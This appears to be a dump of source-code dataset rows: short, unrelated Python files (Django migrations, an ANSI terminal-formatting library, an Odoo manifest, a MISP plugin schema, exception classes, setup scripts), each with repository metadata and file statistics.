bc6cdbf3e4b26a511628069599121803456f8610 | 1,254 | py | Python | bills/migrations/0017_auto_20201113_2304.py | TClaypool00/ExpenseTrackerClient-Python | 44f45e7e7b7434d19a20a0d1b565592a157bed88 | [
"MIT"
] | null | null | null | bills/migrations/0017_auto_20201113_2304.py | TClaypool00/ExpenseTrackerClient-Python | 44f45e7e7b7434d19a20a0d1b565592a157bed88 | [
"MIT"
] | null | null | null | bills/migrations/0017_auto_20201113_2304.py | TClaypool00/ExpenseTrackerClient-Python | 44f45e7e7b7434d19a20a0d1b565592a157bed88 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-14 05:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bills', '0016_auto_20201108_0052'),
]
operations = [
migrations.AddField(
model_name='storeunion',
name='is_completed',
field=models.BooleanField(db_column='IsCompleted', default=True),
),
migrations.AlterField(
model_name='storeunion',
name='address',
field=models.CharField(max_length=60, null=True),
),
migrations.AlterField(
model_name='storeunion',
name='city',
field=models.CharField(max_length=70, null=True),
),
migrations.AlterField(
model_name='storeunion',
name='phonenum',
field=models.IntegerField(db_column='phoneNum', null=True),
),
migrations.AlterField(
model_name='storeunion',
name='state',
field=models.CharField(max_length=50, null=True),
),
migrations.AlterField(
model_name='storeunion',
name='zip',
field=models.IntegerField(null=True),
),
]
| 28.5 | 77 | 0.562201 | 117 | 1,254 | 5.897436 | 0.444444 | 0.078261 | 0.165217 | 0.2 | 0.489855 | 0.363768 | 0.363768 | 0.295652 | 0 | 0 | 0 | 0.043376 | 0.319777 | 1,254 | 43 | 78 | 29.162791 | 0.765533 | 0.035885 | 0 | 0.459459 | 1 | 0 | 0.120961 | 0.019056 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc6e45207e2a15f499a33c60115585ff6253b709 | 1,620 | py | Python | plugins/misp/komand_misp/triggers/search_for_tag/schema.py | JaredAllen13/insightconnect-plugins | f68ce8c60ad20439284228dfcbcd9f8c1c0c7d31 | [
"MIT"
] | null | null | null | plugins/misp/komand_misp/triggers/search_for_tag/schema.py | JaredAllen13/insightconnect-plugins | f68ce8c60ad20439284228dfcbcd9f8c1c0c7d31 | [
"MIT"
] | null | null | null | plugins/misp/komand_misp/triggers/search_for_tag/schema.py | JaredAllen13/insightconnect-plugins | f68ce8c60ad20439284228dfcbcd9f8c1c0c7d31 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
import insightconnect_plugin_runtime
import json
class Component:
DESCRIPTION = "This trigger will search MISP for any events with a specified tag"
class Input:
INTERVAL = "interval"
REMOVE = "remove"
TAG = "tag"
class Output:
EVENTS = "events"
class SearchForTagInput(insightconnect_plugin_runtime.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"interval": {
"type": "integer",
"title": "Interval",
"description": "How frequently (in seconds) to trigger a search",
"default": 60,
"order": 1
},
"remove": {
"type": "boolean",
"title": "Remove",
"description": "If true the tag will be removed",
"default": false,
"order": 3
},
"tag": {
"type": "string",
"title": "Tag",
"description": "The tag to search for",
"order": 2
}
},
"required": [
"interval",
"remove",
"tag"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class SearchForTagOutput(insightconnect_plugin_runtime.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"events": {
"type": "array",
"title": "Events",
"description": "A list of event_ids with the tag",
"items": {
"type": "string"
},
"order": 1
}
},
"required": [
"events"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 19.058824 | 85 | 0.554321 | 161 | 1,620 | 5.385093 | 0.440994 | 0.036909 | 0.093426 | 0.043829 | 0.212226 | 0.212226 | 0.212226 | 0.212226 | 0.099193 | 0.099193 | 0 | 0.005195 | 0.287037 | 1,620 | 84 | 86 | 19.285714 | 0.745455 | 0.02284 | 0 | 0.26087 | 1 | 0 | 0.644529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028986 | false | 0 | 0.028986 | 0 | 0.231884 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc722ef78c247ce8db1d8420b6d1312535bba360 | 904 | py | Python | fidelite/__manifest__.py | progistack/odoo-progistack | c0aded728e4c85b913effabad1fbdb8ff81a8174 | [
"MIT"
] | null | null | null | fidelite/__manifest__.py | progistack/odoo-progistack | c0aded728e4c85b913effabad1fbdb8ff81a8174 | [
"MIT"
] | null | null | null | fidelite/__manifest__.py | progistack/odoo-progistack | c0aded728e4c85b913effabad1fbdb8ff81a8174 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
{
'name': "programme_fidelite",
'summary': """
fidelite programme
""",
'description': """
programme de fidelité
""",
'author': "emmanuel.kissi@progistack.com",
'website': "http://www.yourcompany.com",
'category': 'Uncategorized',
'version': '0.1',
# any module necessary for this one to work correctly
'depends': ['base', 'point_of_sale', 'stock'],
# always loaded
'data': [
'security/ir.model.access.csv',
'views/programme_fidelite_view.xml',
'views/pos_template.xml',
'views/loyalty_field.xml'
],
# only loaded in demonstration mode
'demo': [
],
'qweb': [
'static/src/xml/reward_button.xml',
'static/src/xml/loyalty_field1.xml',
'static/src/xml/show_loyalty_popup.xml',
'static/src/xml/loyalty_receipt.xml',
],
}
| 21.52381 | 57 | 0.571903 | 96 | 904 | 5.260417 | 0.708333 | 0.071287 | 0.09505 | 0.089109 | 0.087129 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005961 | 0.257743 | 904 | 41 | 58 | 22.04878 | 0.746647 | 0.13385 | 0 | 0.178571 | 0 | 0 | 0.628535 | 0.348329 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc8c3de5871da16c5edee54d2671716317efd22e | 14,252 | py | Python | pyansiescapes/commands.py | tillhainbach/ANSIEscapes | 4264f2352fb3bdd7ae04e01c2e44a30eadecf946 | [
"MIT"
] | null | null | null | pyansiescapes/commands.py | tillhainbach/ANSIEscapes | 4264f2352fb3bdd7ae04e01c2e44a30eadecf946 | [
"MIT"
] | null | null | null | pyansiescapes/commands.py | tillhainbach/ANSIEscapes | 4264f2352fb3bdd7ae04e01c2e44a30eadecf946 | [
"MIT"
] | null | null | null | """API for console manipulation using ANSI Escape sequences in Python.
"""
import logging
from itertools import chain
from pyansiescapes.enums import ANSICommands, TextAttributes, ColorDrawingLevel, Colors
from pyansiescapes import utils
import pyansiescapes._types as t
import emojis
_logger = logging.getLogger(__file__)
# Curser controls:
def cursor_up(number_of_lines: int = 1) -> str:
"""Moves cursor up number_of_lines lines."""
return ANSICommands.start + "{:d}A".format(number_of_lines)
def cursor_down(number_of_lines: int = 1) -> str:
"""Moves cursor down number_of_lines lines."""
return ANSICommands.start + "{:d}B".format(number_of_lines)
# Clearers:
def clear_to_end_of_line() -> str:
"""Clears line from current cursor position to the end."""
return ANSICommands.start + "0K"
def clear_to_start_of_line() -> str:
"""Clears line from start to current cursor position."""
return ANSICommands.start + "1K"
def clear_line() -> str:
"""Clears the entire line from start to end."""
return ANSICommands.start + "2K"
def clear_lines(number_of_lines: int = 1) -> str:
"""Clears number_of_lines lines."""
return (clear_line() + cursor_up()) * number_of_lines
def clear_screen_until_end() -> str:
"""Clears screen from current cursor position to the end."""
return ANSICommands.start + "0J"
def clear_screen_to_beginning() -> str:
"""Clears screen from current cursor position to the beginning."""
return ANSICommands.start + "1J"
def clear_screen() -> str:
"""Clears the entire screen. """
return ANSICommands.start + "2J"
# Rich Text formatting:
def format(text: str, *args: t.Any, **kwargs: t.Any) -> str: # pylint: disable=redefined-builtin
"""Return formatted text as str.
Uses the formatting attributes given in `*args` or `**kwargs`.
Postional arguments or keywordarguments that are not supported
will be ignored.
Args:
text: The text/string that should be formatted.
*args: Any number of postional arguments. Unsupported arguments will be
ignored. See "supported arguments" section for futher details.
**kwargs: Any number of keyword arguments. Unsupported keyword arguments
will be ignored. See "supported keywords" section for further
details.
Returns:
The text with leading ANSI Escape sequence "rich text"
commands and a trailing ANSI Escape sequence "reset"
command.
Examples:
>>> # Format text to bold and underlined using postional arguments
>>> format('Hello ANSI!', 'bold', 'underline')
\'\\x1b[1;4mHello ANSI!\\x1b[0m\'
>>> # It's also possible to use keyword arguments with True, False
>>> format('Hello ANSI!', bold=True, underline=True)
\'\\x1b[1;4mHello ANSI!\\x1b[0m\'
>>> # You can also set font and background color
>>> format('Hello ANSI!', color='blue', background='white')
\'\\x1b[34;47mHello ANSI!\\x1b[0m\'
>>> # Or provide a keyword argument dict
>>> format('Hello ANSI!', color={'name':'blue', 'colormode':256}, background='white')
\'\\x1b[38;5;12;47mHello ANSI!\\x1b[0m\'
"""
# parse positional text attributes
text_attribute_arguments = (arg for arg in args
if arg in TextAttributes.__members__.keys()) # pylint: disable=no-member
# parse keyword text attribute arguments:
text_attribute_keywords = (
kwarg for kwarg, value in kwargs.items()
if value and kwarg in TextAttributes.__members__.keys()) # pylint: disable=no-member
text_attributes = (
TextAttributes[key]
for key in chain(text_attribute_arguments, text_attribute_keywords))
# parse positional
color_attributes = []
for i, key in enumerate(["color", "background"]):
try:
value = kwargs[key]
except KeyError:
continue
if isinstance(value, (tuple, list)):
attribute = _color(*value, drawing_level=i)
elif isinstance(value, dict):
attribute = _color(**value, drawing_level=i)
else:
attribute = _color(value, drawing_level=i)
color_attributes.append(attribute)
# encode emojis:
text = emojis.encode(text)
return _format_rich_text(*text_attributes,
*color_attributes) + text + reset()
# TextAttributes:
def reset() -> str:
"""Returns 'reset' ANSI-command string."""
return _format_rich_text(TextAttributes.reset)
def bold() -> str:
"""Returns 'bold text' ANSI-command string."""
return _format_rich_text(TextAttributes.bold)
def underscore() -> str:
"""Returns 'underlined/underscored text' ANSI-command string."""
return _format_rich_text(TextAttributes.underscore)
def underline() -> str:
"""Returns 'underlined/underscored text' ANSI-command string."""
return _format_rich_text(TextAttributes.underline)
def bright() -> str:
"""Returns 'bright/blink text' ANSI-command string."""
return _format_rich_text(TextAttributes.bright)
def blink() -> str:
"""Returns 'bright/blink text' ANSI-command string."""
return _format_rich_text(TextAttributes.blink)
def reversed() -> str: # pylint: disable=redefined-builtin
"""Returns 'reversed text' ANSI-command string."""
return _format_rich_text(TextAttributes.reversed)
def concealed() -> str:
"""Returns 'concealed text' ANSI-command string."""
return _format_rich_text(TextAttributes.concealed)
# Colors:
def color(*args: t.Any, **kwargs: t.Any) -> str:
"""Returns ANSI Escape Sequence for specified color.
Args:
*args: any valid positional argument for :func:`._color`.
**kwargs: any valid keyword argument for :func:`._color`.
Examples:
>>> # Get string for 8-bit red text coloring (e.g. foreground).
>>> color(name="red")
\'\\x1b[31m\'
>>> # Get string for bold red background.
>>> color(name="red", bold=True, drawing_level="background")
\'\\x1b[41;1m\'
>>> # Get string for 256-bit red background.
>>> color(name="red", bold=True, blink=True, drawing_level="background")
\'\\x1b[48;5;9m\'
>>> # Get string for mediumspringgreen foreground 256-bit color.
>>> color(name="mediumspringgreen")
\'\\x1b[38;5;49m\'
"""
return _format_rich_text(_color(*args, **kwargs))
def _color(name: t.Optional[t.ColorArg] = None, # pylint: disable=too-many-arguments
color_id: t.Optional[t.Union[int, str]] = None,
hexa: t.Optional[str] = None,
rgb: t.Optional[t.ColorValue] = None,
hsl: t.Optional[t.ColorValue] = None,
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground,
bold: bool = False, # pylint: disable=redefined-outer-name
blink: bool = False, # pylint: disable=redefined-outer-name
bright: bool = False, # pylint: disable=redefined-outer-name
colormode: int = 8) -> str:
"""Returns ANSI color-string for specified color.
Color value argument get parsed in this order:
- \(0) colorid, (1) name, (2) hexa, (3) rgb, (4) hsl.
Colormode gets toggled in this order:
- Conditions for 256-bit colormode are checked first:
- :py:`color_id is not None and color_id > 8`
- :py:`name not in` :class:`.Colors` or ``name`` is in hexa-, rgb- or
hsl-format (see below)
- :py:`any(hexa, rgb, hsl)`
- :py:`bright or blink or colormode == 256`
- Next the condition for 16-bit colormode are checked:
- :py:`((color_id < 8 or name in` :class:`.Colors` :py:`) and bold)`
:py:`or colormode == 16`
- If none of the above conditions are true, fallback to default
8-bit colormode.
Args:
name: A color name.
Can be of format:
- Any name in :class:`.Colors` or :class:`.Colors256`.
- Integer or Integer-string (triggers color id parsing.)
- Strings with leading ``#`` (triggers hex-value parsing.)
- Tuple, list or array-like (triggers parsing as either rgb- or
hsl-values based on the input values.)
See :func:`.utils.parse_color_name` for details on parsing logic.
color_id: The color id as integer or integer-string.
hexa: A hexadecimal color value as str. Must start with a leading ``#``.
See :func:`.utils.parse_hex` for details on parsing logic.
rgb: Color values in rgb color space. Must be iterable and of length 3.
See :func:`.utils.parse_color_value` for details on parsing logic.
hsl: Color values in hsl color space. Must be iterable and of lenght 3.
See :func:`.utils.parse_color_value` for detail on parsing logic.
drawing_level:
The color drawing level.
Valid foreground values are:
- :py:`'foreground'`, :attr:`.ColorDrawingLevel.foreground`,
:py:`0`, :py:`False`, :py:`'3'`
Valid background values are:
- ``'background'``, :attr:`.ColorDrawingLevel.background`,
:py:`1`, :py:`True`, :py:`'4'`
Default: :py:`"foreground"`
bold: Triggers bold colors (16-bit).
Default: False
blink: Triggers "blink/birght" colors (256-bit).
Deafault: False
bright: Triggers "blink/birght" colors (256-bit).
Default: False
colormode: Triggers 8-, 16-, or 256-bit colors. Any in (8, 16, 256).
Default: 8
Raises:
TypeError: If all color arguments are None.
"""
# Parse drawing level
drawing_level = utils.parse_drawing_level(drawing_level)
colormode = utils.parse_colormode(colormode, blink, bright, bold)
_logger.debug("%d", colormode)
# Check if a valid color was provided
argc, arg = utils.get_first_color_argument(color_id, name, hexa, rgb, hsl)
# Look-up correct get color id function
get_color_id = utils.parsing_switcher(argc, arg)
color_id, colormode = get_color_id(arg, colormode)
_logger.debug("%s, %d", color_id, colormode)
color_string = utils.get_color_string(color_id, colormode)
return drawing_level + color_string
# convenience functions:
def color_8bit(
name: str,
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit colors.
Trys to find the color_id for provided name. Returns an empty string if name
is not an 8-bit color.
Args:
name: A color name. Any color name in Colors.
drawing_level: The color drawing level.
Valid foreground values are:
- "foreground", :attr:`.ColorDrawingLevel.foreground`, 0, "3"
Valid background values are:
- "background", :attr:`.ColorDrawingLevel.background`, 1, "4"
Default: "foreground"
"""
if utils.is_8bit_color(name):
drawing_level = utils.parse_drawing_level(drawing_level)
return _format_rich_text(drawing_level + Colors[name])
return ""
def background(*args: t.Any, **kwargs: t.Any) -> str:
"""Convenience function for colored backgrounds.
Returns a call to :func:`.color` with drawing_level= :attr:`.ColorDrawingLevel.background`.
See color for further description of input arguments. Drawing_level keyword
argument should be omitted."""
return color(*args, **kwargs, drawing_level=ColorDrawingLevel.background)
def black(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit black color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("black", drawing_level)
def red(drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit red color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("red", drawing_level)
def green(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit green color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("green", drawing_level)
def yellow(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit yellow color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("yellow", drawing_level)
def blue(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit blue color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("blue", drawing_level)
def magenta(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit magenta color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("magenta", drawing_level)
def cyan(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit cyan color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("cyan", drawing_level)
def white(
drawing_level: t.DrawingLevelArg = ColorDrawingLevel.foreground
) -> str:
"""Convenience function for 8-bit white color.
See :func:`.color_8bit` for further details.
"""
return color_8bit("white", drawing_level)
def _format_rich_text(*formatting_commands: str) -> str:
"""Return an ANSI Escapes Sequence for rich text formatting.
Mutiple formatting commands are chained using the ANSI command seperator.
"""
ansi_command = ANSICommands.start
logging.debug("_format_rich_text received: %s",
(", ".join(formatting_commands)))
ansi_command += ANSICommands.separator.join(formatting_commands)
ansi_command += ANSICommands.stop
logging.debug("%s", ANSICommands._debug_esc + ansi_command[1:]) # pylint: disable=protected-access
return ansi_command
if __name__ == '__main__':
import doctest
doctest.testmod()
| 33.455399 | 104 | 0.654084 | 1,750 | 14,252 | 5.201714 | 0.172 | 0.051412 | 0.019993 | 0.024168 | 0.414589 | 0.373284 | 0.311875 | 0.27815 | 0.229045 | 0.189828 | 0 | 0.013311 | 0.230424 | 14,252 | 425 | 105 | 33.534118 | 0.816648 | 0.528557 | 0 | 0.136691 | 0 | 0 | 0.020885 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.223022 | false | 0 | 0.05036 | 0 | 0.503597 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
bcab12ea9e3bbde444dd2d1a8e766fc3d9d9ba2e | 303 | py | Python | redirink/links/apps.py | Egor4ik325/redirink | 17ef85f48145ee6112f2fcbab60dcd9d65ba78bf | [
"MIT"
] | null | null | null | redirink/links/apps.py | Egor4ik325/redirink | 17ef85f48145ee6112f2fcbab60dcd9d65ba78bf | [
"MIT"
] | null | null | null | redirink/links/apps.py | Egor4ik325/redirink | 17ef85f48145ee6112f2fcbab60dcd9d65ba78bf | [
"MIT"
] | 1 | 2021-12-31T00:46:31.000Z | 2021-12-31T00:46:31.000Z | from django.apps.config import AppConfig
class LinksConfig(AppConfig):
"""
Application config for links.
"""
name = "redirink.links"
verbose_name = "_(Redirect links)"
label = "links"
default_auto_field = "django.db.models.BigAutoField"
def ready(self):
pass
| 18.9375 | 56 | 0.653465 | 33 | 303 | 5.878788 | 0.787879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237624 | 303 | 15 | 57 | 20.2 | 0.839827 | 0.09571 | 0 | 0 | 0 | 0 | 0.251938 | 0.112403 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
bcbf197b2c17185e81af40866de7d1563f998143 | 436 | py | Python | projects/vdk-core/tests/functional/run/test_run_job_name_directory.py | alod83/versatile-data-kit | 9ca672d3929eb3dc6fe5c677e8c8a75e2a0d2be8 | [
"Apache-2.0"
] | 100 | 2021-10-04T09:32:04.000Z | 2022-03-30T11:23:53.000Z | projects/vdk-core/tests/functional/run/test_run_job_name_directory.py | alod83/versatile-data-kit | 9ca672d3929eb3dc6fe5c677e8c8a75e2a0d2be8 | [
"Apache-2.0"
] | 208 | 2021-10-04T16:56:40.000Z | 2022-03-31T10:41:44.000Z | projects/vdk-core/tests/functional/run/test_run_job_name_directory.py | alod83/versatile-data-kit | 9ca672d3929eb3dc6fe5c677e8c8a75e2a0d2be8 | [
"Apache-2.0"
] | 14 | 2021-10-11T14:15:13.000Z | 2022-03-11T13:39:17.000Z | # Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
from click.testing import Result
from functional.run import util
from vdk.plugin.test_utils.util_funcs import cli_assert_equal
from vdk.plugin.test_utils.util_funcs import CliEntryBasedTestRunner
def test_run():
runner = CliEntryBasedTestRunner()
result: Result = runner.invoke(["run", util.job_path("job-name-directory")])
cli_assert_equal(0, result)
| 29.066667 | 80 | 0.78211 | 61 | 436 | 5.42623 | 0.557377 | 0.042296 | 0.07855 | 0.102719 | 0.223565 | 0.223565 | 0.223565 | 0.223565 | 0 | 0 | 0 | 0.018229 | 0.119266 | 436 | 14 | 81 | 31.142857 | 0.84375 | 0.144495 | 0 | 0 | 0 | 0 | 0.056757 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.125 | false | 0 | 0.5 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
bcc31f250009ebd634d0ba0cb5892eaa77990576 | 191 | py | Python | landmarkerio/mode.py | cl445/landmarkerio-server | f500c206e47cdad7d09a55f334d7441ebe5ec38a | [
"BSD-3-Clause"
] | 10 | 2015-01-13T19:20:54.000Z | 2020-05-11T13:59:02.000Z | landmarkerio/mode.py | cl445/landmarkerio-server | f500c206e47cdad7d09a55f334d7441ebe5ec38a | [
"BSD-3-Clause"
] | 18 | 2015-01-12T17:01:37.000Z | 2021-08-21T08:38:44.000Z | landmarkerio/mode.py | cl445/landmarkerio-server | f500c206e47cdad7d09a55f334d7441ebe5ec38a | [
"BSD-3-Clause"
] | 15 | 2015-02-02T16:49:44.000Z | 2021-07-12T08:04:29.000Z | class UnexpectedMode(ValueError):
def __init__(self, mode: str) -> None:
super().__init__(
f"Unexpected mode - found '{mode}' but must be 'image' or 'mesh'"
)
| 31.833333 | 77 | 0.586387 | 22 | 191 | 4.727273 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.277487 | 191 | 5 | 78 | 38.2 | 0.753623 | 0 | 0 | 0 | 0 | 0 | 0.324607 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bce139983ddcb0f79405ffa6e9dfe7161f8e70ee | 123 | py | Python | Mundo 1/ex025 Procurando uma string dentro de outra.py | AbelRapha/Python-Exercicios-CeV | 17e7055c982c8a1224992602ece50bae8eeee365 | [
"MIT"
] | null | null | null | Mundo 1/ex025 Procurando uma string dentro de outra.py | AbelRapha/Python-Exercicios-CeV | 17e7055c982c8a1224992602ece50bae8eeee365 | [
"MIT"
] | null | null | null | Mundo 1/ex025 Procurando uma string dentro de outra.py | AbelRapha/Python-Exercicios-CeV | 17e7055c982c8a1224992602ece50bae8eeee365 | [
"MIT"
] | null | null | null | nome = input("Digite seu nome ").strip().lower()
confirmacao = 'silva' in nome
print(f"Seu nome tem silva {confirmacao}") | 24.6 | 48 | 0.699187 | 18 | 123 | 4.777778 | 0.666667 | 0.162791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138211 | 123 | 5 | 49 | 24.6 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0.427419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bcf758c1f0ee706900b5807447cf29380772aabe | 241 | py | Python | setup.py | Redmar-van-den-Berg/tssv | 4a3a798abba9edabb391f5b96ef740e5de84c434 | [
"MIT"
] | 1 | 2018-08-31T01:31:03.000Z | 2018-08-31T01:31:03.000Z | setup.py | Redmar-van-den-Berg/tssv | 4a3a798abba9edabb391f5b96ef740e5de84c434 | [
"MIT"
] | 3 | 2019-08-28T20:28:16.000Z | 2022-01-11T22:08:51.000Z | setup.py | Redmar-van-den-Berg/tssv | 4a3a798abba9edabb391f5b96ef740e5de84c434 | [
"MIT"
] | 1 | 2021-05-07T08:35:55.000Z | 2021-05-07T08:35:55.000Z | from setuptools import setup
from distutils.core import Extension
setup(
ext_modules=[Extension(
'tssv.sg_align',
['tssv/sgAlignWrapper.c', 'tssv/sgAlign.c', 'tssv/sgAlignSSE.c'],
extra_compile_args=['-O3'])]
)
| 21.909091 | 73 | 0.6639 | 29 | 241 | 5.37931 | 0.689655 | 0.064103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0.190871 | 241 | 10 | 74 | 24.1 | 0.794872 | 0 | 0 | 0 | 0 | 0 | 0.282158 | 0.087137 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bcfd1e3a131793ec3380770de0dbebcd119fb50d | 1,569 | py | Python | src/ai/backend/client/exceptions.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 7 | 2019-01-18T08:08:42.000Z | 2022-02-10T00:36:24.000Z | src/ai/backend/client/exceptions.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 179 | 2017-09-07T04:54:44.000Z | 2022-03-29T11:30:47.000Z | src/ai/backend/client/exceptions.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 13 | 2017-09-08T05:37:44.000Z | 2021-09-14T23:35:31.000Z | from typing import Any
import json
__all__ = (
'BackendError',
'BackendAPIError',
'BackendClientError',
'APIVersionWarning',
)
class BackendError(Exception):
'''Exception type to catch all ai.backend-related errors.'''
def __str__(self):
return repr(self)
class BackendAPIError(BackendError):
'''Exceptions returned by the API gateway.'''
def __init__(self, status: int, reason: str, data: Any):
if isinstance(data, (str, bytes)):
try:
data = json.loads(data)
except json.JSONDecodeError:
data = {
'type': 'https://api.backend.ai/probs/generic-error',
'title': 'Generic Error (could not parse error string)',
'content': data,
}
super().__init__(status, reason, data)
@property
def status(self) -> int:
return self.args[0]
@property
def reason(self) -> str:
return self.args[1]
@property
def data(self) -> Any:
return self.args[2]
class BackendAPIVersionError(BackendError):
"""
Exception indicating that the given operation/argument is not supported
in the currently negotiated server API version.
"""
class BackendClientError(BackendError):
"""
Exceptions from the client library, such as argument validation
errors and connection failures.
"""
pass
class APIVersionWarning(UserWarning):
"""
The warning generated if the server's API version is higher.
"""
pass
| 22.73913 | 76 | 0.609305 | 163 | 1,569 | 5.766871 | 0.521472 | 0.035106 | 0.044681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002686 | 0.288082 | 1,569 | 68 | 77 | 23.073529 | 0.838854 | 0.236456 | 0 | 0.135135 | 0 | 0 | 0.144621 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.054054 | 0.054054 | 0.108108 | 0.432432 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 2 |
4c00c15e13cd5d0fb466e753c11edbb99e3a2f5a | 351 | py | Python | generated-sources/python-flask/mojang-status/openapi_server/controllers/default_controller.py | AsyncMC/Mojang-API-Libs | b01bbd2bce44bfa2b9ed705a128cf4ecda077916 | [
"Apache-2.0"
